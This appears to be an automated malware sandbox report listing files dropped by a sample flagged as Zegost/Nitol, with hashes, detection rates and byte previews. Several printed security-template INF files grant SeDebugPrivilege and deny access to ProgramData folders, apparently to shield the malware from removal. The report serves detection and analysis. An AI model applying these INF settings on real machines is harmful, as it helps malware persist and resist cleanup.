                                                                                                                  SHA1:5B436806114CB26D272810C2F69E1618FE73316E
                                                                                                                  SHA-256:34772680D41E1D19362BAE352A6D22B37E5BEF109C3CEE58617ADC6CF28A0270
                                                                                                                  SHA-512:BDD51D13735AA612318EEA5286CCD47B6C77D0B6A120925A3CF1AFDB72FB5EF552FFCA71226A2E3412C75E430E81F840C01FA4A9A99DF7BC5DF387F769ABF667
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:.......................................;...{..&....|..4....|..........4....|..4....|../"..4....|...................(n.4....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\ProgramData\Microsoft\Program\ziliao.jpg

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:DOS executable (COM)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):226751
                                                                                                                  Entropy (8bit):6.2660733927228165
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:x/x6F5WCmLGEOmC4v8Z0J+c4v8Z0J+FI8:x/xSWYEOO
                                                                                                                  MD5:DAAA9CCA71158FDE7CF6AC5183D8603B
                                                                                                                  SHA1:75EC321977385303E71484FF0BC321A2898C63B1
                                                                                                                  SHA-256:E1A6BA897AD0D5F5B0580BC82AD3C2D6AD9621B3B88D9E66ED5673FF60FB24AF
                                                                                                                  SHA-512:9F307AF2D74CAE1018D25249741CC83FE34A0A0AA57C78CCAE34B70AD37B8427B4FB3DF96EC58E9E6599154BD0787001E67D8DEAE41B9F1598870774D64762EB
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:....U....SV.q<W.U.D.x..tm.|.|.tf.\...]...t[.T...t. ..D.$..U...3.u..E..t:.<.3....}.....t...i..........C....u.].......;u.t..u.B;.r.3._^[..].}..u..E....P.U.......WQ.U...U..Q.e.......X-.....E..E...].U..QQd.0...SVW.@...P..A..r$3.z(...~.........ar......i.........Nu.....................u.3.j..T..........P.x. ..........3.b4.^.C........3.s.H..C........3...\p.C...........C..E..E.ntdlf.E.l.P.S..3...y....._....3......C....N...YY_^.C.[..].r..a...U......M..E.SV..u.3......MZ..f9.u.W.x<...?PE....s....L...f9G...d......f9G...W...j@h.....wP3.S.Q.......=....wT.E..u.V.P..~<3....]..}.f;G.sX.]......E..H...t+..8.t..0.@...P.E.Q.P.....8.v..w8.E.Q.P..E..M...(.E.A..G.;.M..E.|.3........t`9.....tX..0.E.B..]...E...~1..TY....E..0..%....f;E.u...........+G4..2C;].|.3.E....A....E.....u.........t.9.....tw...i..P.E..P..E...."....E.....u..H..P...M...U....t3.]...y.......F...P.u.........E.....E.....u.}.3.E.....E..@...u.........t?.L1.3.j.X+..M......]..E.E..t...Sj.V...M..E...@.M..E.;.u

                                                                                                                  C:\ProgramData\Program\iusb3mon.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2766808
                                                                                                                  Entropy (8bit):7.933976018907124
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:U+tZSmbzaMRyI0buyb4lhjlTJuv3bA6gmq4xzJEU3llQfqQjF0jR:U+aIc2JTJu/bfFq4xj3vIqB
                                                                                                                  MD5:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  SHA1:757005A267819F25A7F1179C01210569D1B984AB
                                                                                                                  SHA-256:B2044FBEBA355178E0D584F5F467B946C48FDD25AD3282C40E20C2E13FFC16C7
                                                                                                                  SHA-512:60207EA69689D4DDB9B830AD5C64A9F77124C61DD4F4CB87E48E238B4E4183BAD2DE18B304921ED844877A5588704A136F00661B1FE813E0DA843101B2E28FD6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.;...........@...........................c......u*...@..................................0.......@..@.............)..U.......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... .!...........n..............@..@ ,............|..............@..B.idata.......0......................@....rsrc........@......................@..@.winlice.@8..`......................`....boot.....(...;...(.................`..`........................................................................................................................

                                                                                                                  C:\ProgramData\mntemp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe
                                                                                                                  File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16
                                                                                                                  Entropy (8bit):4.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:g8UIkPj:gFxj
                                                                                                                  MD5:55E1040BAD0503B2DA8563DD7385B308
                                                                                                                  SHA1:EA1E541B56DE241E93B2A4CF34E5C1BB7069E4A7
                                                                                                                  SHA-256:47C8AE61658501EA8C804044AB259B7DEA5C82FFC5B28D40EEC13492FD4D8EB0
                                                                                                                  SHA-512:0A84D6E01D8368F49B8285C07B778D2574DE59C43FFFC50A8151B326A5977065D0771738BF6467C0A2424F30964277B502EF52E298B78EACEDE920982F4E8C3B
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..R.v.m.....Y.T

                                                                                                                  C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2766808
                                                                                                                  Entropy (8bit):7.933976018907124
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:49152:U+tZSmbzaMRyI0buyb4lhjlTJuv3bA6gmq4xzJEU3llQfqQjF0jR:U+aIc2JTJu/bfFq4xj3vIqB
                                                                                                                  MD5:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  SHA1:757005A267819F25A7F1179C01210569D1B984AB
                                                                                                                  SHA-256:B2044FBEBA355178E0D584F5F467B946C48FDD25AD3282C40E20C2E13FFC16C7
                                                                                                                  SHA-512:60207EA69689D4DDB9B830AD5C64A9F77124C61DD4F4CB87E48E238B4E4183BAD2DE18B304921ED844877A5588704A136F00661B1FE813E0DA843101B2E28FD6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.;...........@...........................c......u*...@..................................0.......@..@.............)..U.......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... .!...........n..............@..@ ,............|..............@..B.idata.......0......................@....rsrc........@......................@..@.winlice.@8..`......................`....boot.....(...;...(.................`..`........................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:@...e...........................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Windows setup INFormation
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):390
                                                                                                                  Entropy (8bit):3.70121954190789
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:Q+eSREiRFGjowZaDaK2YhvfqlbTb47ZkW:Q+eSREMAF42SiJP4lB
                                                                                                                  MD5:B66F55531E3BC2059BC9DC2925BD022D
                                                                                                                  SHA1:D2F77035A6CFFF4F3FCE7F08902B790623C5C48A
                                                                                                                  SHA-256:1A19404888C3463A206AE85DA582A233E4FF74E5AFEA7FCE71D24E3F71F88B8C
                                                                                                                  SHA-512:8FE726CACE14EEFEDEBA9E9367F9D415B631525BF4EC1DD43C0A91890EF92382C1D24631165566114468BF0C38999569C7D5BAA3089BE1606DC243D2116FC129
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.r.o.g.r.a.m.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

                                                                                                                  C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):402
                                                                                                                  Entropy (8bit):3.119365858996026
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:QUlpORbl/Hml1NG3g+1bElaMiA/CIU9MWl9:Q/RbVar+RDAjUXv
                                                                                                                  MD5:D1C0BC599A4C572AE9594D1E1E10BC07
                                                                                                                  SHA1:633550F3435365D5DB14D7AC40753DFC2EE5A7F0
                                                                                                                  SHA-256:5B66B234FD58126EF3E32582E46101E10970D61083D7F9439EB04E2A151FEB49
                                                                                                                  SHA-512:4E75A7C8A72820212F61AAD771FAD6C61E5CD432F7B5E39C1DEB8E975BF8BE3F2A317E12F49996D0685A6FAB8AED34B7D4A3D8D6829CA65D41E5F65713025CC5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:.. .Y.o.u. .d.o. .n.o.t. .h.a.v.e. .s.u.f.f.i.c.i.e.n.t. .p.e.r.m.i.s.s.i.o.n.s. .t.o. .p.e.r.f.o.r.m. .t.h.i.s. .c.o.m.m.a.n.d... . .M.a.k.e. .s.u.r.e. .t.h.a.t. .y.o.u. .a.r.e. .r.u.n.n.i.n.g. .a.s. .t.h.e. .l.o.c.a.l. .a.d.m.i.n.i.s.t.r.a.t.o.r. .o.r. .h.a.v.e. .o.p.e.n.e.d. .t.h.e. .c.o.m.m.a.n.d. .p.r.o.m.p.t. .u.s.i.n.g. .t.h.e. .'.R.u.n. .a.s. .a.d.m.i.n.i.s.t.r.a.t.o.r.'. .o.p.t.i.o.n.......

                                                                                                                  C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Windows setup INFormation
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):384
                                                                                                                  Entropy (8bit):3.6991205247583334
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvfgDJrlbhEZUEn4lywCfHhkW:Q+eSREiRFGjowZaDaK2YhvfqlbEd7ZkW
                                                                                                                  MD5:FA353436F217DA03FE4519A7E87768CC
                                                                                                                  SHA1:766A1F589BABFD00B0CC0FEEDDB22E7DB408E975
                                                                                                                  SHA-256:A0814A0E57FD427C73E0938D4B507EA43CDF1A720D27D36E5C7530099082E1CC
                                                                                                                  SHA-512:43C3A23178A71B714FB9AEF57F8CB413C13E001DD28BD3DC0F23272F7FECEBB83E24892F0CF59331C1D6B111DCE7A91965793D2BE435939FAD72B184AFFB074F
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.D.a.t.a.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

                                                                                                                  C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2
                                                                                                                  Entropy (8bit):1.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..

                                                                                                                  C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Windows setup INFormation
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):242
                                                                                                                  Entropy (8bit):3.536378176812677
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvn:Q+eSREiRFGjowZaDaK2Yhvn
                                                                                                                  MD5:1F3CD3C20662B3BB095A373DBD1DEC58
                                                                                                                  SHA1:D5AA739E0BF5D0B103713AF5BBA01359530AABDF
                                                                                                                  SHA-256:7EA20DD93DBB33C14C7D9772B39828B3360FBE080DF2B5AAD14BA3D838E18DA5
                                                                                                                  SHA-512:08C554EE7F897B070DF94E6F3B5B366AE69B12D16F90D34B4CD4D9C95037D6178447B39E732FCCF898F6C768318AB117B03DB2363CD55CFACD7F53530D86FE0C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....

                                                                                                                  C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2
                                                                                                                  Entropy (8bit):1.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0izz3hzu.l1c.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lbpvu12.5wn.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12do3fm5.j5e.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uhushdb.vat.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wcnvzrw.lqb.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m01eku4.g2z.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nlfgt3k.q3r.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4n25jzvq.jva.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4rvi1xb1.dc0.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tq5ggch.vdp.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51xbbdtl.b5v.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
